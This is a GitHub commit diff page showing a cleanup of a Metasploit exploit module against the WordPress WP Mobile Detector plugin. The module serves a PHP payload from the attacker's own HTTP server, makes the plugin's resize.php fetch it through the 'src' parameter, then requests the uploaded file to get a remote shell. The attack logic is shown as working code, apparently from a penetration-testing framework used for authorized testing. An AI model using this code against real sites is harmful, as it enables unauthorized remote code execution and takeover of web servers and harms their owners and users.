Skip to content

Commit 3847a68

Browse files
committed
Clean up module
1 parent 037c58d commit 3847a68

File tree

1 file changed

+6
-17
lines changed

1 file changed

+6
-17
lines changed

modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb

Lines changed: 6 additions & 17 deletions
Original file line numberDiff line numberDiff line change
@@ -6,9 +6,9 @@
66
class MetasploitModule < Msf::Exploit::Remote
77
Rank = ExcellentRanking
88

9-
include Msf::Exploit::FileDropper
109
include Msf::Exploit::Remote::HTTP::Wordpress
1110
include Msf::Exploit::Remote::HttpServer
11+
include Msf::Exploit::FileDropper
1212

1313
def initialize(info = {})
1414
super(update_info(
@@ -50,9 +50,6 @@ def check
5050
end
5151

5252
def exploit
53-
if datastore['SRVHOST'] == '0.0.0.0'
54-
fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from rhost')
55-
end
5653
payload_name = rand_text_alphanumeric(10) + '.php'
5754

5855
# First check to see if the file is written already, if it is cache wont retrieve it from us
@@ -69,29 +66,22 @@ def exploit
6966

7067
def on_request_uri(cli, _request)
7168
print_good('Payload requested on server, sending')
72-
send_response(cli, payload.encoded, {})
69+
send_response(cli, payload.encoded)
7370
end
7471

7572
print_status('Starting Payload Server')
76-
payload_url = '/' + payload_name
77-
start_service('Uri' => {
78-
'Path' => payload_url,
79-
'Proc' => proc do |cli, req|
80-
on_request_uri(cli, req)
81-
end
82-
})
73+
start_service('Path' => "/#{payload_name}")
8374

84-
payload_full_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + payload_url
85-
print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')}?src=#{payload_full_url}")
75+
print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')}?src=#{get_uri}")
8676

8777
res = send_request_cgi(
8878
'global' => true,
8979
'method' => 'GET',
9080
'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php'),
91-
'vars_get' => {'src' => payload_full_url}
81+
'vars_get' => {'src' => get_uri}
9282
)
9383

94-
if res && res.code == 200
84+
if res && res.code == 200
9585
print_good('Sleeping 5 seconds for payload upload')
9686
register_files_for_cleanup(payload_name)
9787

@@ -104,7 +94,6 @@ def on_request_uri(cli, _request)
10494
})
10595
# wait for callback, without this we exit too fast and miss our shell
10696
Rex.sleep(2)
107-
handler
10897
else
10998
if res.nil?
11099
fail_with(Failure::Unreachable, 'No response from the target')

0 commit comments

Comments
 (0)